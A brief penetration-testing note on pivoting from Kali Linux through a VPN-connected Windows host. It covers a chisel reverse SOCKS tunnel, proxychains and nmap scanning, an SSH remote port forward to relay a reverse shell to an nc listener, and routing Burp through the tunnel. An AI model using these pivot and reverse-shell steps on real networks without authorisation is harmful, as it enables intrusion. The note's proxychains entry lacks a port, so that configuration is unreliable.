Pivot in a Case

If you have a VPN to target machine, but just running in the windows machine, and you wanna attack from Kali Linux.

1. Fire up the windows and establish the VPN connection, make sure you can access the target machine.

2. Setup connection Host-Only connection between windows machine and kali machine. make sure you can communicate with kali machine.

3. Upload chisel.exe to the windows machine, and install chisel in the Kali.

4. Setup chisel server in the Kali Machine

chisel server -p 9090 --reverse

1. Then connect to the chisel server with windows machine.

.\chisel.exe client <ip kali machine>:9090 R:socks

1. Set /etc/proxychains.conf with socks5 proxy

[ProxyList]
socks5 127.0.0.1 

1. Test connection Important: This connection will reproduce source IP in the packet with the windows ip, so you can't do ping, because Kali machine can't receive the ICMP packet. If you do nmap, always use -Pn for ignoring the ping to discover the machine.

proxychains nmap -Pn <target machine behind the windows machine>

How to setup reverse shell?

ref: https://www.youtube.com/watch?v=mOuqPROMmZc

You need another forward proxy from windows machine to the kali machine.

there is 2 options based on the middle machine. Linux Machine & have ssh

ssh -R <middle machine IP>:<port>:127.0.0.1:<listen port> user_middle@<middle machine IP>
ssh -R <middle machine IP>:443:127.0.0.1:8080 user_middle@<middle machine IP>

Your reverse shell:

host:<middle machine IP>
port: 443

netcat listening shell:

nc -lvnp 8080

How about setting up your burpsuite?

ref: https://www.youtube.com/watch?v=Q5ujOEXGOo8

requirement: 1. tunnel connection with socks5 127.0.0.1 9666 --> use chisel above

1. Set your browser proxy to burp proxy

2. Just let it go :D